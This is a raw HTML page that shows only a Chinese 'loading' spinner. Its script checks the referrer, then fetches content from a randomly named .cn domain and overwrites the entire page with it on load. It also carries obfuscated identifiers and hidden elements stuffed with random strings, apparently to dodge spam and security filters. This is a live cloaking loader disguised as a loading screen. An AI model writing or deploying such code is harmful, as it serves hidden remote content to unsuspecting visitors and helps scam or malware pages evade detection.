<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Y89sSL3D {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Y89sSL3D .BwRu2I {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Y89sSL3D .content {
            line-height: 50px;
            text-align: center
        }

        .Y89sSL3D .img {
            width: 100%
        }

        .Y89sSL3D .N3arNgj {
            text-align: center
        }

        .Y89sSL3D .N3arNgj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Y89sSL3D .N3arNgj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Y89sSL3D .N3arNgj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Y89sSL3D .N3arNgj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Y89sSL3D .N3arNgj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Y89sSL3D .N3arNgj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Y89sSL3D .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RAfbBY7ZXAeoI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kS3ril = RAfbBY7ZXAeoI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kS3ril +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kS3ril +".html?a=share";
		}
		
        zpC7bJ2=url+"#"+new Date().getTime();
        zpC7bJ2 && function() {
            $.get(zpC7bJ2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>FYQmJhcBGfoXHrqefAtXAQkkebHJmsti4BiWpAvlT72ZUZ4RnwADHnH0b8945384H4n4Ti</div>
<img  src='' style='display:none'>
<h1 style='display:none' >PtIShYTEkGNklhkg0La6GfvV9Q474nRiI0r03dj4Xh2OqG2vcP3MpNdvd6SOGH6oRTbWyYq9hVzvaQgWRzr</h1>
<div style='display:none'>FYQmJhcBGfoXHrqefAtXAQkkebHJmsti4BiWpAvlT72ZUZ4RnwADHnH0b8945384H4n4Ti</div>
<ul style='display:none' >AIA2cwY9e1xtr0nwJtuYvcEwvOcYtBiSF808hV</ul><div class="Y89sSL3D">
    <div class="BwRu2I">
        <div class="N3arNgj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>y6ZXds0YTffFQbmdV28XIRduaHeor1mr4yRhKjShIoAl2HymkNqPnSCSFqttHqRQn3HOjyM5f7aozP1YM6mFc</span>
<div style='display:none'>IcxOxmbUB0YsDod5eRXM30jEJj2UEZtQ3u6SSeMqVtad1wjzaNgfyKoMyD1H3n5U3x1uuAoY</div>
<span style='display:none'>y6ZXds0YTffFQbmdV28XIRduaHeor1mr4yRhKjShIoAl2HymkNqPnSCSFqttHqRQn3HOjyM5f7aozP1YM6mFc</span>
<h1 style='display:none' >Qzx5HF2AqFku6xvodSkLDWAZ3SqtndERai0WXKUVRwx5mE</h1>
<div style='display:none'>IcxOxmbUB0YsDod5eRXM30jEJj2UEZtQ3u6SSeMqVtad1wjzaNgfyKoMyD1H3n5U3x1uuAoY</div>
<b style='display:none' >fvIR86cnISoIS4ei9GwVY1yCuZ0CxM8</b></body>
</html>